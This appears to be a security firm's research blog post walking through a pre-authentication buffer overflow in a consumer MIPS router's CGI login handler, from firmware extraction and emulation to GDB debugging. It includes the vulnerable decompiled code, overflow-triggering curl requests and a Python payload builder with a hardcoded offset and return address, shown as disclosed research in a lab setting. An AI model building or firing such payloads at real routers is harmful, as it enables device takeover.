Firmware Hacking: From Router Firmware to Buffer Overflow on MIPS

Franciszek Malek

Mar 27, 2026

•

min read

The first time I tried to debug a CGI binary on a MIPS router, GDB killed the session after one HTTP request. The process forked, handled the request, and exited. Session gone. No breakpoint hit. I reconnected, sent another request, same result. The tutorials I found either debugged the binary directly (skipping the problem) or stopped at "attach GDB to the process" without mentioning that the process dies in 200 milliseconds.

That was the easy part. The NOP sled I tried to use encoded as null bytes - which terminated the sprintf that carried my payload. The stack address I measured was off by megabytes because I measured it outside of lighttpd's execution environment. The $ra register I needed to overwrite is not on the stack the way ret works on x86 - the compiler puts it there explicitly, and if you don't understand when, you don't know where to aim.

This is a full firmware hacking walkthrough - firmware extraction through Ghidra reverse engineering to confirmed pre-authentication buffer overflow on a consumer MIPS router. Every step documented, including the parts that took hours to figure out. Responsible disclosure is complete and a CVE assignment is pending. It ends at overflow confirmation with ASLR disabled.

What is a buffer overflow? A buffer overflow occurs when a program writes more data into a fixed-size memory buffer than it was designed to hold. The excess data overwrites adjacent memory - including the saved return address that controls where execution continues after the current function returns. By controlling that return address, an attacker redirects execution to injected code or existing code gadgets.

Environment Setup

QEMU System Emulation

Embedded IoT targets run on dedicated hardware with limited debug interfaces. UART access exists on many devices but requires physical modification and soldering. QEMU provides full debugger access, memory inspection, and breakpoints on standard hardware.

Two QEMU modes exist. qemu-user translates individual MIPS binaries on the fly under the host kernel - simpler but inaccurate for kernel-level behavior like ASLR. qemu-system runs a full MIPS virtual machine with its own kernel. ASLR entropy, /proc layout, system call behavior - all consistent with a real embedded device. I use qemu-system.

Do not use a kernel image dumped from the target router. Device kernels are stripped, lack debug support, and were compiled for specific SoC hardware that QEMU's Malta machine model does not replicate. Use a standard Debian MIPS kernel from Aurel32's pre-built images.

sudo qemu-system-mipsel \
  -M malta \
  -kernel vmlinux-3.2.0-4-4kc-malta \
  -hda debian_wheezy_mipsel_standard.qcow2 \
  -append "root=/dev/sda1 console=ttyS0" \
  -nographic \
  -net nic \
  -net user,hostfwd=tcp::8080-:80,hostfwd=tcp::8443-:443,hostfwd=tcp::2222-:22,hostfwd=tcp::4445-:4445

The hostfwd entries map host ports to VM ports. Port 8080 reaches the web server on port 80. Port 2222 reaches SSH. console=ttyS0 directs kernel output to the serial port that QEMU exposes as stdout with -nographic.

Firmware Extraction

Download the firmware archive from the vendor's support page. Transfer it to the VM and extract with binwalk:

scp -P 2222 firmware.zip root@127.0.0.1:/root/
binwalk -Me firmware.bin

The result is a squashfs-root/ directory containing the router's complete userland - bin/, lib/, usr/, www/, everything. Before entering the chroot, bind-mount virtual filesystems:

mount --bind /proc proc/
mount --bind /dev dev/
mount --bind /sys sys/
chroot squashfs-root/ /bin/sh

You are now running the router's userland on a full MIPS kernel with access to a working debugger.

Static GDBServer

The router's filesystem does not include a debugger. Drop in a statically compiled gdbserver - a single self-contained MIPSEL binary with no library dependencies:

scp -P 2222 gdbserver-mipsel-static root@127.0.0.1:/root/squashfs-root/gdbserver
chmod +x /root/squashfs-root/gdbserver

On the analysis host, install gdb-multiarch for cross-architecture debugging.

Binary Protections

Before reading disassembly, check what mitigations the binary has:

checksec squashfs-root/www/cgi-bin/[target].cgi

Arch:     mipsel-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       No NX
PIE:      No PIE

No stack canary means the saved $ra register can be overwritten with no tripwire. No NX means injected code on the stack can execute directly. No PIE means every function and gadget address is constant across executions. This is representative of consumer router firmware - IoT devices routinely ship without the mitigations that desktop software considers baseline. ASLR, enabled at the kernel level, is the one protection present.

For initial analysis, disable ASLR on the VM:

echo 0 > /proc/sys/kernel/randomize_va_space

Why MIPS Stack Frames Look Different From x86

On x86, ret pops the return address from the stack and jumps to it. On MIPS there is no ret instruction.

Functions return by jumping to the $ra register (jr $ra). At function entry, the compiler saves $ra to the stack with sw $ra, offset($sp) and restores it before returning with lw $ra, offset($sp). Overwrite the saved $ra on the stack, and the function jumps to your address when it returns.

The prologue also saves $s0 through $s7 - the callee-saved registers. These are restored from the stack before the return. If you overflow past the target buffer, you overwrite all of them before reaching $ra. This is useful - it means you control those registers going into any ROP chain.

Branch Delay Slots

Every branch and jump instruction on MIPS has a branch delay slot: the instruction immediately following the branch always executes before the branch takes effect. This is a pipeline artifact.

jalr  $t9           # call through $t9
move  $a0, $s0      # delay slot - sets $a0 just after the call

The move executes before control transfers. The compiler fills delay slots with useful work intentionally. Decompilers hide this, but raw disassembly always shows it. Be aware when stepping through code in GDB: stepping over a jalr executes the delay slot instruction first, then transfers.

Finding the Vulnerability with Ghidra

The main CGI handler processes all web management requests - authentication, configuration, firmware updates. main alone is thousands of lines of decompiled code. Manually reading it top-to-bottom is not practical.

The strategy: identify dangerous functions, cross-reference their call sites, and evaluate whether arguments are attacker-controlled.

In Ghidra, open the Symbol Tree panel, expand Functions, locate sprintf. Right-click and select Show References To. This lists every call site. For a large CGI binary, there will be dozens.

The filtering approach: cross-reference sprintf usage with code paths reachable via action=login or similar pre-authentication query parameters. Login handlers are high-value targets because they are pre-authentication by definition - no credentials required to reach them - and they routinely process user-supplied strings directly.

One call site in main stands out immediately.

The Vulnerable Code

memset(v32, 0, sizeof(v32));
memset(v34, 0, sizeof(v34));
memset(post_body, 0, sizeof(post_body));

query_string   = getenv("QUERY_STRING");
content_length = getenv("CONTENT_LENGTH");
v5             = strtol(content_length, 0, 10);
v6             = getenv("stationIp");
if (!v6)
    v6 = getenv("REMOTE_ADDR");

v7 = v5 + 1;
v8 = (const char *)malloc(v7);
memset(v8, 0, v7);
fread(v8, 1, v7, stdin);

if (!query_string)
    goto LABEL_15;

if (strstr(query_string, "action=login"))
{
    if (strstr(query_string, "flag=ie8"))
    {
        v31 = (const char *)getenv("http_host");
        sprintf(post_body,
            "{\"topicurl\":\"loginAuth\",\"loginAuthUrl\":\"%s&http_host=%s&flag=ie8\"}",
            v8, v31);
        v11 = post_body;
    }

Reading this carefully:

CONTENT_LENGTH from the environment controls how many bytes fread reads from stdin into v8. The HTTP Content-Length header sets this value. The binary allocates exactly v5 + 1 bytes and reads that many. v8 is fully attacker-controlled in both size and content.

http_host comes from the HTTP Host: header via the environment.

sprintf writes into post_body - a fixed-size stack buffer - using both v8 and v31 as %s arguments with no length check.

The overflow path: POST body -> v8 -> sprintf -> post_body (fixed-size stack buffer). Pre-authentication. No credentials required.

The distance between post_body and the saved $ra slot - confirmed from the prologue sw $ra, 0x128C($sp) - gives the exact overflow offset needed.

How Linux Fork and Exec Affect CGI Stack Layouts

Understanding the kernel-level mechanics explains why CGI debugging is harder than debugging a persistent service - and why stack addresses from one context don't transfer to another.

When lighttpd receives a CGI request, it calls fork(). The child inherits the parent's memory layout. Then execve() replaces the child with the CGI binary. This triggers a full process image replacement: the kernel loads the new binary, sets up a fresh stack, and places arguments and environment variables at the top. The stack base is independently randomized if ASLR is enabled.

The consequence: the CGI binary's stack layout depends on what environment variables lighttpd passes to execve. Each variable adds bytes to the initial stack. The frame offset from the buffer to $ra is identical in both direct invocation and lighttpd execution - that is the compiled frame layout. But the absolute address of the buffer differs by several megabytes depending on how many environment bytes lighttpd passes.

This is the source of the "works in GDB, fails in real execution" problem. Always measure stack addresses under the actual execution environment.

Debugging Forked CGI Processes with GDB

This is where most tutorials stop or hand-wave. CGI binaries live for one request, and GDB's default behavior kills the session when the process exits. Here is the workflow that works.

Step 1: Start lighttpd and gdbserver

Inside the chroot:

lighttpd -f /etc/lighttpd/lighttpd.conf
pgrep lighttpd   # note the PID
./gdbserver --multi 0.0.0.0:4446

The --multi flag keeps gdbserver alive between process deaths. Without it, gdbserver exits when the CGI process exits.

Step 2: Connect with extended-remote

set architecture mips:isa32r2
set sysroot /path/to/squashfs-root
target extended-remote 127.0.0.1:4446
attach [lighttpd_pid]
set follow-fork-mode child
set detach-on-fork off
catch exec
continue

The key distinction: target extended-remote instead of target remote. With target remote, the session terminates when the process exits. With extended-remote, the connection survives process deaths.

Step 3: Trigger the CGI

From a second terminal:

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    -d "test" \
    -H "Host: [redacted]"

GDB catches the fork, follows the exec into the CGI binary, and stops at the exec catchpoint.

Step 4: The Reconnection Dance

After the CGI process exits, the child inferior is gone. Most documentation stops here. The natural assumption is to use GDB's inferior switching commands to return to lighttpd - but in practice, inferior management behaves unreliably in this scenario. Processes that have already exited show as <null>, switching to them produces errors.

disconnect
target extended-remote 127.0.0.1:4446
attach [lighttpd_pid]
set follow-fork-mode child
set detach-on-fork off
catch exec
continue

Fire another curl request and the sequence repeats. This pattern does not appear in any IoT debugging writeup I found. Most tutorials either debug the CGI directly (avoiding the problem) or leave readers to figure out the reattachment themselves.

Breakpoints Must Use Absolute Addresses

When attached to lighttpd, GDB resolves main to lighttpd's main. A relative breakpoint like break *main+0x710 lands in lighttpd code, not CGI code. Since the binary has no PIE, virtual addresses in Ghidra are real runtime addresses:

break *0x[address from decompiler]

Confirming the Overflow

Generate a de Bruijn cyclic pattern and send it as the POST body:

from pwn import *
pattern = cyclic(5000)
with open("pattern.bin", "wb") as f:
    f.write(pattern)

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    --data-binary @pattern.bin \
    -H "Content-Length: 5000" \
    -H "Host: [redacted]"

After the crash, inspect $ra:

info registers ra

from pwn import *
print(cyclic_find(0x????????))  # substitute the $ra value

The result is the number of bytes from the POST body start to the saved $ra slot - confirming attacker-controlled data overwrites the return address.

One subtlety: the sprintf format string prepends a 40-byte JSON wrapper before the POST body content. The cyclic offset measures from the POST body start, not from the post_body buffer start. This matters when calculating absolute stack addresses.

Payload Construction and Delivery

MIPS NOP Sled

The MIPS nop instruction encodes as four null bytes. Since sprintf terminates on null bytes, a traditional NOP sled destroys the payload. The standard substitute is slti a2, zero, -1 - a compare-immediate with no meaningful side effect and no null bytes:

nop = b"\xff\xff\x06\x28"   # slti a2, zero, -1 - MIPS LE

Building the Payload

import struct
import sys

nop      = b"\xff\xff\x06\x28"
nop_sled = nop * 500          # 2000 bytes

shellcode = open(sys.argv[1], "rb").read().rstrip(b"\x00")

OFFSET     = 4412             # bytes from POST body start to saved $ra
STACK_ADDR = 0x7fff59c8       # $s0 + 0x28, measured from GDB with ASLR=0

pre     = nop_sled + shellcode
padding = b"A" * (OFFSET - len(pre))
ret     = struct.pack("<I", STACK_ADDR)
payload = pre + padding + ret

with open("test.bin", "wb") as f:
    f.write(payload)

print(f"total: {len(payload)} bytes")

Content-Length must match exactly. fread reads exactly v5 + 1 bytes. If the header value is smaller than the payload file, fread stops early and the return address bytes are never read.

curl -s "http://127.0.0.1:8080/[redacted]?action=login&flag=ie8" \
    --data-binary @test.bin \
    -H "Content-Length: $(wc -c < test.bin)" \
    -H "Host: [redacted]"

Troubleshooting Payload Delivery

Getting the offset right is half the battle. Confirming the payload bytes land in memory where expected is the other half.

Inspecting the Buffer

Set a breakpoint at the jalr that calls sprintf. Before the call, post_body is zeroed by memset. After the call, inspect:

x/40x $s0

The first 40 bytes contain the JSON prefix. Starting at $s0 + 0x28, you should see the NOP sled bytes repeating. For \xff\xff\x06\x28, GDB displays 0x2806ffff in little-endian word format.

Verify the return address landed at the saved $ra slot:

x/4x ($sp + 0x128C)

Should show c8 59 ff 7f - the little-endian encoding of 0x7fff59c8.

Failure Signatures

If the Buffer Shows Zeros Instead of Your Sled

Check that CONTENT_LENGTH matches the actual payload size
Verify that fread read the full file - inspect $s5 (the source buffer) before sprintf
Confirm the payload file starts with your sled bytes: xxd test.bin | head -5

Tracing Execution After the Return

After confirming $ra is set correctly, let the function return and check where execution lands:

break *0x7fff59c8
continue

When the breakpoint hits, inspect surrounding instructions:

x/20i $pc

You should see the NOP sled instructions (slti a2, zero, -1) executing in sequence.

Limitations

ASLR-disabled only. STACK_ADDR is a hardcoded value from a single GDB session. With randomize_va_space set back to 2, the stack base changes on every exec and the address is invalid. This demonstrates control flow redirection under lab conditions - not against a live device with full mitigations.

Environment sensitivity. Stack layout under lighttpd differs from direct CGI invocation because lighttpd sets additional environment variables. A different lighttpd configuration, firmware revision, or environment variable set will shift $ra relative to the stack base. Offsets must be re-derived for each target configuration.

MIPS I-cache / D-cache coherency. On real MIPS hardware, the instruction cache and data cache are separate. When sprintf writes injected code via the data cache, the instruction cache at that address may hold stale content. Jumping to injected code executes whatever was in the instruction cache - producing SIGILL or unpredictable behavior. QEMU does not emulate this split. On real hardware, a cache flush gadget is required, which is one reason ROP chains targeting existing library functions are more reliable than injected shellcode on MIPS.

All injected bytes must be null-free. Any \x00 in the NOP sled or shellcode causes sprintf to terminate the write. The pre-zeroed buffer means those bytes stay zero - $ra gets zero instead of your target address.

FAQ

Do I need the physical router device for firmware hacking?

No. The entire workflow runs inside a QEMU virtual machine using a firmware filesystem extracted from a downloaded firmware image. Physical device access is not needed for reverse engineering and overflow confirmation. A physical device would allow testing against real hardware with real ASLR.

Why use qemu-system instead of qemu-user for firmware analysis?

qemu-user runs under the host kernel, meaning /proc/sys/kernel/randomize_va_space controls host ASLR, not MIPS ASLR. Stack layout may differ from real embedded Linux. qemu-system runs a full MIPS kernel and gives accurate behavior for ASLR entropy, /proc layout, and system calls.

Why does my MIPS shellcode not work?

Most likely: cache coherency. On real MIPS hardware, the instruction cache and data cache are separate (Harvard architecture). Code written to the stack via sprintf goes through the data cache. The instruction cache at that address may still hold stale content. On QEMU this is not emulated, so shellcode works in emulation but fails on hardware. Use a cache flush gadget or switch to ROP chains that call existing library functions already in the instruction cache.

What is the MIPS null byte problem?

The MIPS nop instruction encodes as four null bytes (\x00\x00\x00\x00). sprintf copies strings until it encounters a null byte. Any null byte in your payload terminates the write, leaving everything after it - including the return address - at their zeroed values. Use slti a2, zero, -1 (\xff\xff\x06\x28 on little-endian MIPS) as a null-free NOP substitute.

How do I debug CGI processes that fork and die?

Use gdbserver --multi with target extended-remote. Set follow-fork-mode child, detach-on-fork off, and catch exec. When the CGI exits, disconnect from GDB, reconnect to gdbserver, re-attach to the lighttpd PID, and re-set the fork/exec settings. This is the only reliable cycle - GDB's inferior management does not handle CGI process death well.

Why does the stack address differ between direct CGI invocation and lighttpd?

Lighttpd sets environment variables before execve-ing the CGI binary. Each environment variable adds bytes to the initial stack state. The frame offset from the buffer to $ra is identical in both cases - that is the compiled frame layout. But absolute stack addresses differ by megabytes depending on how many bytes of environment data lighttpd passes to execve. Always measure under the real execution environment.

About This Research

This writeup documents original firmware analysis work on a consumer MIPS router currently available for purchase. The vulnerability was confirmed on a real device, not only in emulation. Responsible disclosure is complete and a CVE assignment is pending.

The methodology - firmware extraction, QEMU emulation, Ghidra static analysis, GDB fork-following for CGI debugging, payload tracing - applies broadly to embedded Linux targets. The specific binary protections absent here are common across a wide class of consumer router firmware compiled before these mitigations became standard.

Security researchers working on similar targets will find the GDB debugging workflow and payload troubleshooting sections the most transferable. The lighttpd attachment pattern and failure signature table apply regardless of the specific vulnerability or architecture.

This is the kind of firmware hacking and binary exploitation work my team at AFINE does routinely. We have published 150+ CVEs across SAP, Microsoft, IBM, CyberArk, F5, Rapid7, and others. If you are evaluating IoT pentesting or embedded security capabilities, get in touch.

Subscribe to AFINE Newsletter

References

Monthly Security Report

Subscribe to our Enterprise Security Report. Every month, we share what we're discovering in enterprise software, what vulnerabilities you should watch for, and the security trends we're seeing from our offensive security work.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

Gradient glow background for call-to-action section

Table of contents

FAQ

Monthly Security Report

Related posts

Stealing Passwords via HTML Injection Under a Strict CSP

How to Choose a Penetration Testing Company - The 2026 Buyer's Checklist

Time of Check Time of Use (TOCTOU): Anatomy of a Race Condition in GNU sed

Cookie Settings